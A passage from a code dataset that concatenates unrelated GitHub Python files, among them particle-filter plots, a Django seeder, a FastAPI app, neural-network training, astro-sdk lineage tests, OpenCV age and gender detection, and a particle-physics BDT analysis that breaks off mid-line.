H_estimate\n\n# H_particle_vector = np.zeros((100, len(raw_data)))\n# H_particle = np.zeros(len(raw_data))\n#\n# for i in range(0, 100):\n# H_particle_vector[i,:] = particle_filter(raw_data, phi, Q, 10000, ksi)\n#\n#\n\nnp.random.seed(2003)\nH_particle = particle_filter(raw_data, phi, Q, 10000, ksi)\n\nplt.figure(1, figsize=(15,4))\nplt.plot(H_particle, color= 'red', label = 'Particle filter', linestyle= 'dashed')\n# for i in range(0, 100):\n# plt.plot(H_particle_vector[i, :], color='red', label='Particle filter', linestyle='dashed')\nplt.plot(H_vec, color= 'black', label= 'Kalman filter')\nplt.legend()\nplt.show()\n\nnp.random.seed(2008)\nH_particle = particle_filter(raw_data, phi, Q, 10000, ksi)\n\nplt.figure(1, figsize=(15,4))\nplt.plot(H_particle, color= 'red', label = 'Particle filter', linestyle= 'dashed')\n# for i in range(0, 100):\n# plt.plot(H_particle_vector[i, :], color='red', label='Particle filter', linestyle='dashed')\nplt.plot(H_vec, color= 'black', label= 'Kalman filter')\nplt.legend()\nplt.show()\n\n\n","repo_name":"thomasvollebregt97/WDPS","sub_path":"Assignment2_final.py","file_name":"Assignment2_final.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"9906309955","text":"import os.path\n\ninput_file = os.path.join(os.path.dirname(__file__), \"input.txt\")\nwith open(input_file, \"r\") as f:\n data = f.read().splitlines()\n\ntemplate = data[0]\nrules = {k: v for k, v in (x.split(\" -> \") for x in data[2:])}\n\nfor step in range(10):\n new_template = [template[0]]\n for i in range(len(template) - 1):\n pair = template[i : i + 2]\n if pair in rules:\n new_template.append(rules[pair])\n new_template.append(pair[1])\n else:\n new_template.append(pair[1])\n template = \"\".join(new_template)\n\ncounts = {}\nfor char in template:\n counts[char] = counts.get(char, 0) + 1\nsort_counts = tuple(sorted(counts.values(), reverse=True))\nprint(sort_counts[0] - sort_counts[-1])\n","repo_name":"tctree333/Advent-Of-Code","sub_path":"2021/Day 14/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70805956205","text":"from django.core.management.base import BaseCommand\nfrom apimonitor.models import User, Transaction\nfrom faker import Faker\nimport random\nimport decimal\n\n\nclass Command(BaseCommand):\n help = \"Seed the users and transactions tables with initial data\"\n\n def handle(self, *args, **options):\n fake = Faker()\n tiers = [choice[0] for choice in User.TIER_CHOICES]\n\n # Seed Users\n users = []\n for _ in range(10):\n user = User(\n email=fake.email(),\n account_balance=decimal.Decimal(random.uniform(100, 500000)),\n tier=random.choice(tiers),\n )\n users.append(user)\n User.objects.bulk_create(users)\n\n # Seed Transactions\n transactions = []\n for user in User.objects.all():\n for _ in range(random.randint(0, 20)):\n recipient = random.choice(User.objects.exclude(pk=user.pk))\n transaction = Transaction(\n amount=decimal.Decimal(random.uniform(1000, 200000)),\n sender=user,\n to=recipient,\n narration=fake.sentence(),\n )\n transactions.append(transaction)\n Transaction.objects.bulk_create(transactions)\n\n self.stdout.write(self.style.SUCCESS(\"Database seeded successfully\"))\n","repo_name":"aoamusat/herconomy","sub_path":"seeder/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22085166666","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom methods import users, rooms\n\n\napp = FastAPI()\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\napp.mount('/users', users)\napp.mount('/rooms', rooms)","repo_name":"horanchikk/AnonyME","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"3762452344","text":"from numpy import argmax\nfrom sys import maxsize\n\nfrom ai.improvement import Improvement\n\n\nclass ImprovementWithQ(Improvement):\n def __init__(self, decay_rate, decay, decay_max, decay_min):\n \"\"\"\n A policy improvement method which uses the calculated q-values.\n :param decay_rate: rate at which decay nears its minimum.\n :param decay: starting decay.\n :param decay_max: maximum decay.\n :param decay_min: minimum decay.\n \"\"\"\n super(ImprovementWithQ, self).__init__(decay_rate, decay, decay_max, decay_min)\n\n def improve(self):\n for s in range(self.mdp.n_states):\n a_star = argmax([self.q[s][a] for a in range(self.mdp.n_actions)])\n\n for a in range(self.mdp.n_actions):\n self.policy[s][a] = 1. * self.decay / self.mdp.n_actions\n\n if a_star == a:\n self.policy[s][a] += 1 - self.decay\n return super(ImprovementWithQ, self).improve()\n","repo_name":"TheRealJP/Markov-Decision-Proces","sub_path":"ai/improvements/with_q.py","file_name":"with_q.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30375891922","text":"from __future__ import annotations\nfrom typing import List, Callable, TypeVar, Tuple\nfrom chap7.layer import Layer\nfrom chap7.util import sigmoid, derivative_sigmoid\n\nT = TypeVar(\"T\")\n\n\nclass Network:\n def __init__(\n self,\n layer_structure: List[int],\n learning_rate: float,\n activation_function: Callable[[float], float] = sigmoid,\n derivative_activation_function: Callable[[float], float] = derivative_sigmoid,\n ) -> None:\n if len(layer_structure) < 3:\n raise ValueError(\"Error: Network should have 3 layers at least.\")\n self.layers: List[Layer] = []\n input_layer: Layer = Layer(\n None,\n layer_structure[0],\n learning_rate,\n activation_function,\n derivative_activation_function,\n )\n self.layers.append(input_layer)\n for previous, num_neurons in enumerate(layer_structure[1:]):\n next_layer = Layer(\n self.layers[previous],\n num_neurons,\n learning_rate,\n activation_function,\n derivative_activation_function,\n )\n self.layers.append(next_layer)\n\n def outputs(self, input_: List[float]) -> List[float]:\n value = input_\n for layer in self.layers:\n value = layer.outputs(value)\n return value\n\n def backpropagate(self, expected: List[float]) -> None:\n # 出力層\n self.layers[-1].calculate_deltas_for_output_layer(expected)\n # 隠れ層\n for l in range(len(self.layers) - 2, 0, -1):\n self.layers[l].calculate_deltas_for_hidden_layer(self.layers[l + 1])\n\n def update_weights(self) -> None:\n for layer in self.layers[1:]:\n for neuron in layer.neurons:\n for i, w in enumerate(neuron.weights):\n w = w + (\n neuron.learning_rate\n * layer.previous_layer.output_cache[i]\n * neuron.delta\n )\n\n def train(self, inputs: List[List[float]], expecteds: List[List[float]]) -> None:\n for input_, expected in zip(inputs, expecteds):\n self.outputs(input_)\n self.backpropagate(expected)\n self.update_weights()\n\n def validate(\n self,\n inputs: List[List[float]],\n expecteds: List[T],\n interpret_output: Callable[[List[float]], T],\n ) -> Tuple[int, int, float]:\n correct: int = 0\n for input_, expected in zip(inputs, expecteds):\n result: T = interpret_output(self.outputs(input_))\n if result == expected:\n correct += 1\n percentage: float = correct / len(inputs)\n return correct, len(inputs), percentage\n","repo_name":"tatsuya4559/ClassicComputerScienceProblemsInPython","sub_path":"chap7/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29101797639","text":"\nimport os\nimport data\nimport math\nimport utils\nimport network\n\nimport numpy as np\nimport tensorflow as tf\n\nSHOW_PLOT = 'SHOW_PLOT' in os.environ\n\n# Training parameters\nNUM_EPOCHS = int(os.environ.get('NUM_EPOCHS', 500))\nLEARNING_RATE = float(os.environ.get('LEARNING_RATE', 1e-5))\n\nMAX_VIDEOS = math.inf\nif 'RUNNING_ON_LOCAL' in os.environ:\n MAX_VIDEOS = 4\n\n# Intialize frame loader\nframe_loader = data.FeatureLoader(max_videos=MAX_VIDEOS)\ninput_size = frame_loader.BOTTLENECK_TENSOR_SIZE\ncells_x = frame_loader.cells_x\ncells_y = frame_loader.cells_y\n\n# Split in train, validation and test\nframe_loader = utils.ValidationMinibatches(frame_iterator=frame_loader, cache=frame_loader.data_can_fit_in_memory())\n\n# Setup network\nnn = network.LogisticClassifier(name='simple-features-model-1',\n input_shape=(None, input_size),\n target_shape=(None, cells_x * cells_y + 1), learning_rate=LEARNING_RATE,\n verbose=True)\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nwith tf.Session(config=config) as sess:\n nn.init(sess)\n\n lossTracker = utils.LossTracker(name=nn.name, num_epochs=NUM_EPOCHS, verbose=True)\n for epoch in range(0, NUM_EPOCHS):\n\n train_loss = 0.\n train_batches = 0\n for features, targets in frame_loader.train:\n train_loss += nn.train_op(session=sess, x=features / features.std(), y=targets)\n train_batches += 1\n train_loss /= train_batches\n\n val_loss = 0.\n val_batches = 0\n for features, targets in frame_loader.val:\n val_loss += nn.val_op(session=sess, x=features / features.std(), y=targets)\n val_batches += 1\n val_loss /= val_batches\n\n lossTracker.addEpoch(train_loss=train_loss, val_loss=val_loss)\n\n # Save model\n nn.save(sess)\n\n # Finally evaluate on test data\n test_loss = 0.\n test_batches = 0\n for features, targets in frame_loader.test:\n test_loss += nn.val_op(session=sess, x=features / features.std(), y=targets)\n test_batches += 1\n test_loss /= test_batches\n\n lossTracker.addFinalTestLoss(test_loss)\n lossTracker.save()\n","repo_name":"LasseRegin/02456-project","sub_path":"code/logistic_features_classifier.py","file_name":"logistic_features_classifier.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37419869433","text":"import socket\nfrom unittest import mock\n\nimport pytest\nfrom airflow.models import Connection\n\nfrom astro.table import Metadata, Table\n\n\n@pytest.mark.integration\n@pytest.mark.parametrize(\n \"connection,name,namespace,uri\",\n [\n (\n Connection(\n conn_id=\"test_bq\", conn_type=\"gcpbigquery\", extra={\"project\": \"astronomer-dag-authoring\"}\n ),\n \"astronomer-dag-authoring.dataset.test_tb\",\n \"bigquery\",\n \"bigquery:astronomer-dag-authoring.dataset.test_tb\",\n ),\n (\n Connection(\n conn_id=\"test_redshift\",\n conn_type=\"redshift\",\n schema=\"astro\",\n host=\"local\",\n port=5439,\n login=\"astro-sdk\",\n password=\"\",\n ),\n \"astro.test_tb\",\n \"redshift://local:5439\",\n \"redshift://local:5439/astro.test_tb\",\n ),\n (\n Connection(\n conn_id=\"test_pg\",\n conn_type=\"postgres\",\n login=\"postgres\",\n password=\"postgres\",\n host=\"postgres\",\n port=5432,\n ),\n \"public.test_tb\",\n \"postgresql://postgres:5432\",\n \"postgresql://postgres:5432/public.test_tb\",\n ),\n (\n Connection(\n conn_id=\"test_snow\",\n conn_type=\"snowflake\",\n host=\"local\",\n port=443,\n login=\"astro-sdk\",\n password=\"\",\n schema=\"ci\",\n extra={\n \"account\": \"astro-sdk\",\n \"region\": \"us-east-1\",\n \"role\": \"TEST_USER\",\n \"warehouse\": \"TEST_ASTRO\",\n \"database\": \"TEST_ASTRO\",\n },\n ),\n \"TEST_ASTRO.ci.test_tb\",\n \"snowflake://astro-sdk\",\n \"snowflake://astro-sdk/TEST_ASTRO.ci.test_tb\",\n ),\n (\n Connection(conn_id=\"test_sqlite\", conn_type=\"sqlite\", host=\"/tmp/sqlite.db\"),\n \"/tmp/sqlite.db.test_tb\",\n f\"file://{socket.gethostbyname(socket.gethostname())}:22\",\n f\"file://{socket.gethostbyname(socket.gethostname())}:22/tmp/sqlite.db.test_tb\",\n ),\n (\n Connection(conn_id=\"test_duckdb\", conn_type=\"duckdb\", host=\"/tmp/duckdb.db\"),\n \"/tmp/duckdb.db.test_tb\",\n f\"file://{socket.gethostbyname(socket.gethostname())}:22\",\n f\"file://{socket.gethostbyname(socket.gethostname())}:22/tmp/duckdb.db.test_tb\",\n ),\n (\n Connection(\n conn_id=\"test_mssql\",\n conn_type=\"mssql\",\n host=\"someserver.com\",\n schema=\"astrodb\",\n port=1433,\n login=\"username\",\n password=\"password\",\n ),\n \"astrodb.dataset.test_tb\",\n \"mssql://someserver.com:1433\",\n \"mssql://someserver.com:1433/astrodb.dataset.test_tb\",\n ),\n (\n Connection(\n conn_id=\"test_mysql\",\n conn_type=\"mysql\",\n host=\"someserver.com\",\n schema=\"astrodb\",\n port=3306,\n login=\"username\",\n password=\"password\",\n ),\n \"dataset.test_tb\",\n \"mysql://someserver.com:3306\",\n \"mysql://someserver.com:3306/dataset.test_tb\",\n ),\n ],\n)\n@mock.patch(\"airflow.providers.google.cloud.utils.credentials_provider.get_credentials_and_project_id\")\n@mock.patch(\"airflow.hooks.base.BaseHook.get_connection\")\ndef test_openlineage_dataset(mock_get_connection, gcp_cred, connection, name, namespace, uri):\n \"\"\"\n Test that name and namespace for lineage is correct for databases\n \"\"\"\n mock_get_connection.return_value = connection\n gcp_cred.return_value = \"astronomer-dag-authoring\", \"astronomer-dag-authoring\"\n tb = Table(conn_id=connection.conn_id, name=\"test_tb\", metadata=Metadata(schema=\"dataset\"))\n\n assert tb.openlineage_dataset_name() == name\n assert tb.openlineage_dataset_namespace() == namespace\n assert tb.openlineage_dataset_uri() == uri\n","repo_name":"astronomer/astro-sdk","sub_path":"python-sdk/tests_integration/sql/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":294,"dataset":"github-code","pt":"19"} +{"seq_id":"22627933267","text":"import sqlite3\nimport threading\n\nimport cv2\nimport sys\nimport os\nfrom PyQt5.QtGui import QImage, QPixmap\nfrom qtconsole.qt import QtGui, QtCore\nimport keyboard\nfrom PyQt5.QtCore import pyqtSlot, QTimer\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QSplashScreen, QProgressBar\nfrom PyQt5.uic import loadUi\n\nimport DisplayImage\nimport DisplayVideo\nimport GenderAndAge\n\n\nclass Main(QMainWindow):\n def __init__(self):\n super(Main, self).__init__()\n self.ImageName = \"\"\n self.video = None\n self.resizeImage = None\n self.resultImage = None\n self.cap = None\n self.timer = QTimer(self)\n loadUi('GenderAndAgeGitUI.ui', self)\n self.getPersonImage.clicked.connect(self.GetImageFromDrive)\n self.computeImage.clicked.connect(self.ComputeImage)\n\n\n @pyqtSlot()\n def GetImageFromDrive(self):\n self.showResult.setText(\"Click Guess For\" + \"\\n\" + \"Result\")\n fname, filter = QFileDialog().getOpenFileName(self, 'Open File', 'c:\\\\', \"Image Files(*.jpg)\")\n if fname:\n self.LoadImage(fname)\n else:\n print(\"invalid Input\")\n\n @pyqtSlot()\n def ComputeImage(self):\n self.showResult.setText(\"Running...\")\n age_net, gender_net = GenderAndAge.initialize_caffe_models()\n font = cv2.FONT_HERSHEY_SIMPLEX\n\n self.resultImage = cv2.imread(self.ImageName, 1)\n self.resultImage = cv2.resize(self.resizeImage, (300,450), fx=2, fy=2, interpolation=cv2.INTER_AREA)\n cv2.threshold(self.resultImage, 127, 255, cv2.THRESH_BINARY)\n\n face_cascade = cv2.CascadeClassifier('Model/haarcascade_frontalface_alt.xml')\n\n gray = cv2.cvtColor(self.resultImage, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.2, 4)\n\n if (len(faces) > 0):\n print(\"Found {} faces\".format(str(len(faces))))\n\n for (x, y, w, h) in faces:\n cv2.rectangle(self.resultImage, (x, y), (x + w, y + h), (255, 255, 0), 2)\n\n # Get Face\n face_img = self.resultImage[y:y + h + 50, x:x + w + 50].copy()\n\n blob = cv2.dnn.blobFromImage(face_img, 1, (227, 227), GenderAndAge.MODEL_MEAN_VALUES, swapRB=False)\n\n # Predict Gender\n gender_net.setInput(blob)\n gender_preds = gender_net.forward()\n gender = GenderAndAge.gender_list[gender_preds[0].argmax()]\n print(\"Gender : \" + gender)\n\n # Predict Age\n age_net.setInput(blob)\n age_preds = age_net.forward()\n age = GenderAndAge.age_list[age_preds[0].argmax()]\n print(\"Age Range: \" + age)\n\n self.showResult.setText(\"Gender : \" + gender + \"\\n\" + \"Age :\" + age)\n\n overlay_text = \"%s %s\" % (gender,age)\n\n cv2.putText(self.resultImage, overlay_text, (x-10, y-10), font, .6, (255, 255, 255), 1, cv2.LINE_AA)\n\n\n\n DisplayImage.DisplayResultImage(self)\n\n\n\n def StartLiveCam(self):\n self.LoadVideo(0)\n\n def LoadVideo(self, vname):\n self.cap = cv2.VideoCapture(vname)\n self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 4000)\n self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, 750)\n self.timer.timeout.connect(self.update_frame)\n self.timer.start(10)\n\n def LoadImage(self, fname):\n self.image = cv2.imread(fname)\n self.resizeImage = cv2.resize(self.image, (300, 450))\n self.ImageName = fname\n DisplayImage.DisplayImage(self)\n\n def update_frame(self):\n font = cv2.FONT_HERSHEY_SIMPLEX\n age_net, gender_net = GenderAndAge.initialize_caffe_models()\n ret, self.video = self.cap.read()\n face_cascade = cv2.CascadeClassifier('Model/haarcascade_frontalface_alt.xml')\n gray = cv2.cvtColor(self.video, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.1, 5)\n if len(faces) > 0:\n print(\"Found {} faces\".format(str(len(faces))))\n\n for (x, y, w, h) in faces:\n cv2.rectangle(self.video, (x, y), (x + w, y + h), (255, 255, 0), 2)\n\n # Get Face\n face_img = self.video[y:y + h + 50, x:x + w + 50].copy()\n\n blob = cv2.dnn.blobFromImage(face_img, 1, (227, 227), GenderAndAge.MODEL_MEAN_VALUES, swapRB=False)\n\n # Predict Gender\n gender_net.setInput(blob)\n gender_preds = gender_net.forward()\n gender = GenderAndAge.gender_list[gender_preds[0].argmax()]\n print(\"Gender : \" + gender)\n\n # Predict Age\n age_net.setInput(blob)\n age_preds = age_net.forward()\n age = GenderAndAge.age_list[age_preds[0].argmax()]\n print(\"Age Range: \" + age)\n overlay_text = \"%s %s\" % (gender, age)\n cv2.putText(self.video, overlay_text, (x, y), font, 1, (255, 255, 255), 2, cv2.LINE_AA)\n\n DisplayVideo.DisplayVideo(self, self.video, 1)\n # startCapture = threading.Thread(target=GenderAndAge.read_from_camera(self), )\n # startCapture.start()\n\n\napp = QApplication(sys.argv)\nwindows = Main()\nwindows.setWindowTitle('Project Name ')\nwindows.show()\n\nsys.exit(app.exec_())\n","repo_name":"ubihacks/Gender-and-Age-Detection-Caffee-Models","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12481118769","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom finstar_task.views import ReceiptView, ProductView, ShopView, UserShopView, ReceiptListView\n\nrouter = DefaultRouter()\nrouter.register(r'receipt', ReceiptView, basename='receipt')\nrouter.register(r'product', ProductView, basename='product')\nrouter.register(r'shop', ShopView, basename='shop')\nrouter.register(r'user_shop', UserShopView)\nrouter.register('receipt_list', ReceiptListView)\n\nurlpatterns = [\n path('', include(router.urls)),\n path('admin/', admin.site.urls),\n]\n","repo_name":"leget1987/finstar","sub_path":"finstar/finstar/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12949507029","text":"from database.database import *\n\ndef select_university(university_id):\n university_dict = get_universities()\n try:\n university = university_dict[university_id]\n return university\n except Error as e:\n print(e, 'Wrong university id')\n\ndef show_universities():\n university_dict = get_universities()\n for id, university in university_dict.items():\n print(f'ID: {id} | {university}')\n\ndef select_program(university_id, program_id):\n programs = get_program_list(university_id)\n try:\n return programs[program_id]\n except Error as e:\n print(e, 'Wrong index')\n\ndef show_programs(university_id):\n university_dict = get_universities()\n programs = get_program_list(university_id)\n try:\n university = university_dict[university_id]\n except Error as e:\n print(e, 'Wrong index')\n print('Showing the programs of the university {}:'.format(university))\n for t, program in enumerate(programs):\n print(t, ':', program)\n\ndef select_courses(program, university_id, courses_list):\n courses_df = get_courses(program, university_id)\n descriptions = []\n courses = []\n for _, (_, course, _) in courses_df.iloc[courses_list].iterrows():\n descriptions.append(get_course_description(course, university_id))\n courses.append(course)\n return courses, descriptions\n\ndef show_courses(program_id, university_id):\n university_dict = get_universities()\n programs = get_program_list(university_id)\n try:\n university = university_dict[university_id]\n program = programs[program_id]\n except Error as e:\n print(e, 'Wrong index')\n courses_df = get_courses(program, university_id)\n print('University:', university)\n print('Showing available courses for the program:', program)\n for t, (_, course, _) in courses_df.iterrows():\n print(t,':',course)\n\ndef test_summarization():\n '''\n Test function that selects automatically the university, the program and a \n selection courses with the following selection:\n - University: IT University\n - Program: msc data science\n - Courses: [0, 4, 5, 7, 9, 10, 12]\n '''\n university_id = 1\n university = select_university(university_id)\n program = select_program(university_id, 0)\n courses_list = [0, 4, 5, 7, 9, 10, 12]\n courses, descriptions = select_courses(program, university_id, courses_list)\n return courses, descriptions, university, program","repo_name":"israfelsr/course-summarization","sub_path":"summarization/retrieve_data.py","file_name":"retrieve_data.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3934383518","text":"# creating dict\n# user={'name':'Rahul','age':'21'}\nuser=dict(name='Rahul',age=21)\n# print(user)\n# print(type(user))\n# access data from dict\n# using key \n# print(user['name'])\nuser_info={\n 'name':'Rahul',\n 'age':21,\n 'fav_movie':['hollywood','south'],\n}\n# print(user_info['fav_movie'])\n# how to add data in empty dict\nuser1={}\nuser1['name']='mohit'\n# print(user1)\n\n# in keyword in dict\n# if 'names' in user_info:\n# print('present')\n# else:\n# print('not present:') \n\n\n# for values\n# if 21 in user_info.values():\n# print('present')\n# else:\n# print('not present:') \n\n\n# loops\n# for i in user_info.values():\n# print(i)\n\n# values method\n# user_info_values=user_info.values()\n# print(user_info_values)\n# print(type(user_info_values))\n\n\n# keys method\n# user_info_values=user_info.keys()\n# print(user_info_values)\n# print(type(user_info_values))\n\n# \n# for i in user_info:\n# print(user_info[i])\n# \n\n# items method\nuser_items=user_info.items()\n# print(user_items)\n# print(type(user_items))\n\n# for key,value in user_info.items():\n# print(f\"key is {key} and value is {value} \")\n\n# how to add data\nuser_info['fav_song']=['song1','song2']\n# print(user_info)\n\n\n# pop method\n# pop_item=user_info.pop('fav_song')\n# print(pop_item)\n# print(user_info)\n\n\n# === popitem method\n# pooped_item=user_info.popitem()\n# print(user_info)\n# print(type(pooped_item))\n\n# ==== update method\nmore_info={'state':'haryana','hobbies':['coading','reading','cricket']}\nuser_info.update(more_info)\n# print(user_info)\n\n\n\n\n# ==== fromkeys ====\n# d=dict.fromkeys(['name','age','height'],'unknown')\n# d=dict.fromkeys('abc','unknown')\nd=dict.fromkeys(range(1,11),'unknown')\nprint(d)","repo_name":"Rahullchaudhary/Python","sub_path":"dict_intro.py","file_name":"dict_intro.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"16548046553","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n#\t\t\t\t\t\t\tKnown result \t Predicted results\t\t\t Want to plot?\t For Multianalysis \tfor pdf save\ndef predictionY_interval(binsTab, y_train, y_test, y_pred_onTrain, y_pred_onTest, plotResult, computeInterval, pdfName='yPred'): #Function form to use in Multianalysis\n\t\n\tinterval=yTrainSHist=yTrainBHist=yTestSHist=yTestBHist=0\t\t\t\t\t\t\t\t\t\t\t# For the return if not computed\n\tyTestS=y_pred_onTest[y_test==1]\n\tyTestB=y_pred_onTest[y_test==0]\n\n\tif plotResult:\n\t\tyTrainS=y_pred_onTrain[y_train==1]\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Take values at index depending of BDT y output\n\t\tyTrainB=y_pred_onTrain[y_train==0]\n\t\t\n\t\tfig, ax = plt.subplots(figsize=(8, 4), dpi=300) \t\t\t\t\t\t\t\t\t\t\t\t# Want to stack histograms on top of same axes\n\t\tax.hist(yTrainS, bins=binsTab, color='r',histtype='bar',density=True, alpha=0.3) \t\t\t\t# Adding transparency for histogram columns\n\t\tax.hist(yTrainB, bins=binsTab, color='b', histtype='bar',density=True, alpha=0.3) \t\t\t\t# collect the results in varibles for later KS test\n\t\tyTrainSHist = ax.hist(yTrainS, bins=binsTab, color='r', histtype='step',density=True, label='Signal (train)') \t# Histogram values\n\t\tyTrainBHist = ax.hist(yTrainB, bins=binsTab, color='b', histtype='step',density=True, label='Background (train)') \n\t\tyTestSHist = plt.hist(yTestS, bins=binsTab, density=True,alpha = 0.0)\t\t\t\t\t\t\t# Invisible to collect histogram values\n\t\tyTestBHist = plt.hist(yTestB, bins=binsTab, density=True,alpha = 0.0)\n\t\tbin_centers = 0.5*(binsTab[1:] + binsTab[:-1])\n\t\tax.scatter(bin_centers, yTestSHist[0], marker='o', c='r', s=20, alpha=1,label='Signal (test)') \t# Display as dot in histogram\n\t\tax.scatter(bin_centers, yTestBHist[0], marker='o', c='b', s=20, alpha=1,label='Background (test)') \t# Must take first array for data, second one is bins values\n\n\t\tplt.xlabel('BDT signal response')\n\t\tplt.ylabel('Normalized number of events')\n\t\tplt.legend()\n\t\tplt.savefig(f'plots/{pdfName}.pdf')\n\t\tplt.close()\t\n\tif computeInterval:\n\t\tnumberBins=len(binsTab)\n\t\terrorMax=2*(1/(numberBins-1))\n\t\tbinsTab=np.linspace(0, 1, num=numberBins)\n\t\t\n\t\tyTestSHist=np.histogram(yTestS,bins=binsTab,density=False) #Density=True to normalise, not necessary here we just want the max\n\t\tyTestBHist=np.histogram(yTestB,bins=binsTab,density=False)\n\t\tmaxS=np.argmax(yTestSHist[0]) #first tab is the histogram values, second is the bins values on axis\n\t\tmaxB=np.argmax(yTestBHist[0])\n\t\tinterval=abs(binsTab[maxS]-binsTab[maxB])\n\t\t#print(f'Interval between Signal and backgroung max in histogram: {interval} pm {errorMax}')\n\treturn interval,yTrainSHist,yTrainBHist,yTestSHist,yTestBHist\n\n\ndef bgFromExp(blindMin,blindMax,massWidth,paramExpA,paramExpB):\n\treturn (1/massWidth)*( (paramExpA/paramExpB)*(np.exp(-paramExpB*blindMin)-np.exp(-paramExpB*blindMax)) )\ndef monoExp(x, a, b):\n\t\n\treturn (a * np.exp(-b * x) )\n\ndef fitBackground(XselectedBg,printPlotFit):\n\n\t# C,D,E Normalisation factors for easier fit:\n\tC=100\n\tE=5500\n\n\n\tbgMin=5500\n\tbgMax=6500\n\tsteps=21\n\tmassTab=np.linspace(bgMin,bgMax,steps)\t#X axis\n\n\tbinCenters=[(0.5*(massTab[i]+massTab[i+1])-E)/C for i in range (len(massTab)-1)] # X axis transformaion for easier fit\n\tmassB0=XselectedBg['B_s0_DTF_M']\n\tmassHist,binEdges=np.histogram(massB0,bins=massTab,density=False) \t# Histogram computation\n\tD=massHist[0]+1\t\t\t\t\t\t\t\t\t\t\t\t\t\t# +1 to avoid dividing by 0\n\tmassHist=massHist/D \t\t\t\t\t\t\t\t\t\t\t\t# Histogram normilised to be ~1 at x=0\n\n\tparams, paramCov = curve_fit(monoExp, binCenters, massHist,bounds=([0.0,0.0], [2.0, 2.0])) # Do the easier exponential fit\n\ta, b=params\n\tA=D*float(a)*np.exp(float(b)*E/C)\n\tB=float(b)/C\n\tdA=np.sqrt(paramCov[0][0])*D*np.exp(B*E/C)\n\tdB=np.sqrt(paramCov[1][1])/C\n\t#print(f'a: {a}, b: {b}, c:{c}')\n\tprint(f'paramCov: {paramCov}')\n\t#dA, dB, dC=paramCov # Estimated covarience on parameters\n\tif printPlotFit:\n\t\tfig, ax = plt.subplots(figsize=(8, 4), dpi=300) \n\t\tax.plot(binCenters,massHist,'k.',label=f'Mass Histogram')\n\t\tax.plot(binCenters,monoExp(np.array(binCenters),*params),'b--', # * in call to expands the tuple into separate elements\n\t\t\t\t\t\t\t\t\tlabel=f'fit: N={\"{0:.4f}\".format(a)}*exp(-{\"{0:.4f}\".format(b)}*M)')\n\t\tplt.xlabel('B_0 mass')\n\t\tplt.ylabel('Number of events')\n\t\tplt.legend()\n\t\tplt.show()\n\t\tplt.close()\t\n\n\tblindingMin=5100\n\tblindingMax=5500\n\tnBgOutBlinding=len(massB0)\n\tmassWidth=(bgMax-bgMin)/(steps-1)\n\tnBgInBlinding=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A,paramExpB=B)#+ c*(blindingMax-blindingMin) )\n\tnBgcheck1=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A+dA,paramExpB=B+dB)\n\tnBgcheck2=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A-dA,paramExpB=B-dB)\n\tupperNBg=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A+dA,paramExpB=B-dB)\n\tlowerNBg=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A-dA,paramExpB=B+dB)\n\t\n\t#print(f'nBgInBlinding:{nBgInBlinding}')\n\t#print(f'upperNBg:{upperNBg}')\n\t#print(f'lowerNBg:{lowerNBg}')\n\t#print(f'nBgcheck1:{nBgcheck1}')\n\t#print(f'nBgcheck2:{nBgcheck2}')\n\n\n\n\tif( (upperNBgnBgcheck1)|(lowerNBg>nBgcheck2) ):\n\t\tprint(\"ERROR in uncertainty computation, min/max are not extremums.\")\n\t#print(f'Rapport {nBgInBlinding/nBgOutBlinding} between Inside {nBgInBlinding} and outside bliding: {nBgOutBlinding}')\n\tif 